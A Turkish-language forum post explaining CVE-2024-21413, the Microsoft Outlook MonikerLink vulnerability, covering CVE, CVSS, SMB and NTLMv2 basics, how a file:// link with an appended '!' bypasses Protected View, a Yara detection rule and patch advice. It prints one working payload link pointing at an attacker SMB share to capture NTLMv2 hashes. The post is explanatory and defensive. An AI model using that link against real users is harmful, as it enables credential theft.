Hoşgeldin Misafir

CVE-2024–21413 Zafiyeti Nedir ? Anlatım Konusu

SurHan

28 Kas 2017
4,185 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Microsoft, saldırgan tarafından sağlanan bir bağlantıya tıklayarak RCE'ye ve kimlik bilgisi sızıntısına neden olabilen bir Outlook'taki bir zafiyeti duyurdu.

Herkese merhaba! Bu yazıda, Microsoft Outlook RCE ve kimlik bilgisi sızıntısı zafiyetini ele alacağım. Her şeyi en basit şekilde anlaşılır hale getirmeye çalışacağım.

Başlamadan önce öncelikle bazı temellere bakalım, böylece kafamız doğru yerde olur ve olan biteni çok daha iyi anlayabiliriz. Temelleri kısaca gözden geçireceğim; daha önce karşılaşmadıysanız lütfen daha fazla bilgi edinin.

Bir Zafiyet Nedir?

Bir zafiyet, siber güvenlikte bir sistemin veya uygulamanın tasarımında, uygulanmasında veya davranışlarında bir zayıflık veya kusur olarak tanımlanır. Bir saldırgan, bu zayıflıkları kullanarak yetkisiz bilgilere erişebilir veya yetkisiz işlem yapabilir.

Bir CVE Nedir?

Siber güvenlikte, zafiyetler "Ortak Zayıflıklar ve Maruz Kalma" (veya kısaca CVE) altında sınıflandırılır. Bu CVE'lerin biçimi CVE-YIL-IDNUMARA'dır. Bu, güvenlik araştırmacılarının, satıcıların ve kuruluşların bu konuda bilgi iletişimi ve paylaşımını kolaylaştırır.

CVSS Nedir?

Ortak Zayıflık Puanlama Sistemi (CVSS), zafiyet puanlaması için çok popüler bir çerçevedir. CVSS, bir zafiyetin ciddiyetini temsil etmek için 0–10 arasında bir sayısal puan sağlar.

SMB Nedir?

Sunucu İleti Bloğu (SMB), ağlarda dosya ve yazıcı paylaşımı için yaygın olarak kullanılan bir ileti protokolüdür.

NTLMv2 Nedir?

Ağ Zaman Kilidi ve Oturum Açma Mekanizması (veya NTLMv2), bir Windows ağ ortamında istemciler ve sunucular arasında kimlik doğrulaması için başlıca olarak kullanılan bir kimlik doğrulama protokolüdür.

(Temeller Tamam!)

Yani, Microsoft, "Microsoft Outlook RCE & Kimlik Bilgisi Sızıntısı" zafiyetini duyurdu ve ona "CVE-2024–21413" bir numara atadı. Atanan yıl 2024'tür, çünkü bu CVE 13 Şubat 2024'te duyurulmuştur. Bu zafiyeti Check Point Araştırması'ndan Haifei Li bulmuştur. Bu zafiyet için CVSS puanı 9.8'dir (kritik). Bu, zafiyetin derhal giderilmesi için önceliklendirilmesi gerektiği anlamına gelir, çünkü bu zafiyetin bir saldırgan tarafından kötüye kullanılma olasılığı çok yüksektir. (Neyse ki, Microsoft bir yama yayınladı!)

"Microsoft Outlook RCE & Kimlik Bilgisi Sızıntısı" zafiyeti nedir?
Microsoft Outlook, e-postaları HTML (Hypertext Markup Language) biçiminde gösterme yeteneğine sahiptir. HTML, web sayfaları oluşturmak için kullanılan standart işaretleme dilidir. HTML kullanarak, Outlook kullanıcıları, web sayfalarında gördüğümüz gibi görsel olarak çekici ve karmaşık stile sahip e-postalar alabilir ve görüntüleyebilir. Bu HTML biçimlendirme, Outlook'un hiperbağlantıları tanımasına ve işlemesine olanak tanır. Ancak, aynı zamanda, URL'leri belirtilen uygulamaları açabilen moniker bağlantıları olarak açabilir. URL moniker'ları, yazılım geliştirmede URL'leri görüntüleme veya işleme işlemini basitleştiren Microsoft'un Bileşen Nesne Modeli (COM) tarafından sağlanan bir özelliktir. Bu moniker bağlantısı, durumumuzda bir hiperbağlantı olarak kullanılır ve zafiyet burada yatmaktadır.

Outlook'un, kötü amaçlı eklerin veya bağlantıların açılmasını önlemek için yerinde olan bir "Korunan Görünümü" vardır. Böyle bir bağlantıyı tıklamayı denerken, aşağıdaki iletişim kutusunu alırsınız:

1b7b6d7acbca23fe9.png




“file://” moniker linkini kullanarak, Outlook'u bir dosyaya erişmeye yönlendirebiliriz, örneğimizde bir ağ paylaşımındaki bir dosyaya. Outlook, bağlantı aracılığıyla dosyaya erişmeye çalıştığında SMB protokolünü kullanır. Bu süreçte, kurban makinesi otomatik olarak NTLMv2 kimlik doğrulaması kullanarak saldırgan makinesine kimlik doğrulamaya çalışır. Bu tüm süreç, önceden bahsedilen "Korunan Görünüm" tarafından durdurulur. Buradaki güvenlik açığı, Moniker bağlantımıza bir "!" özel karakteri ve metin ekleyerek, Outlook korunan görünümünü atlatmamıza neden olan hyperlinkimizi değiştirerek mevcuttur. Örneğin:

Kod:
<a href="file:///\\\\10.10.111.111\\test\\test.rtf!something">BANA TIKLA</a>

Bu, saldırganın kullanıcı kimlik bilgilerini içeren NTLMv2 özetini (hash) yakalamasına neden olacaktır. Uzaktan Kod Yürütme (RCE) de mümkündür, ancak bunu ele almayacağız.

Tespit
Moniker bağlantısında bir "file://" öğesini tespit etmek için bir Yara kuralı yazılmıştır. Kural, Florian Roth tarafından yazılmıştır.

Kod:
rule EXPL_CVE_2024_21413_Microsoft_Outlook_RCE_Feb24 {

   meta:

      description = "Detects emails that contain signs of a method to exploit CVE-2024-21413 in Microsoft Outlook"

      author = "X__Junior, Florian Roth"

      reference = "https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability/"

      date = "2024-02-17"

      modified = "2024-02-19"

      score = 75

   strings:

      $a1 = "Subject: "

      $a2 = "Received: "



      $xr1 = /file:\/\/\/\\\\[^"']{6,600}\.(docx|txt|pdf|xlsx|pptx|odt|etc|jpg|png|gif|bmp|tiff|svg|mp4|avi|mov|wmv|flv|mkv|mp3|wav|aac|flac|ogg|wma|exe|msi|bat|cmd|ps1|zip|rar|7z|targz|iso|dll|sys|ini|cfg|reg|html|css|java|py|c|cpp|db|sql|mdb|accdb|sqlite|eml|pst|ost|mbox|htm|php|asp|jsp|xml|ttf|otf|woff|woff2|rtf|chm|hta|js|lnk|vbe|vbs|wsf|xls|xlsm|xltm|xlt|doc|docm|dot|dotm)!/

   condition:

      filesize < 1000KB

      and all of ($a*)

      and 1 of ($xr*)

}


Çözüm

Microsoft bu güvenlik açığı için bir yama yayınladı. Ofisinizi Windows üzerinden güncellemeniz kesinlikle önerilir.

Yabancı Kaynaklar

https://research.checkpoint.com/202...bug-in-microsoft-outlook-and-the-big-picture/

https://vulcan.io/blog/cve-2024-21413-fixing-the-monikerlink-vulnerability-in-outlook/

https://www.cve.org/CVERecord?id=CVE-2024-21413

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-21413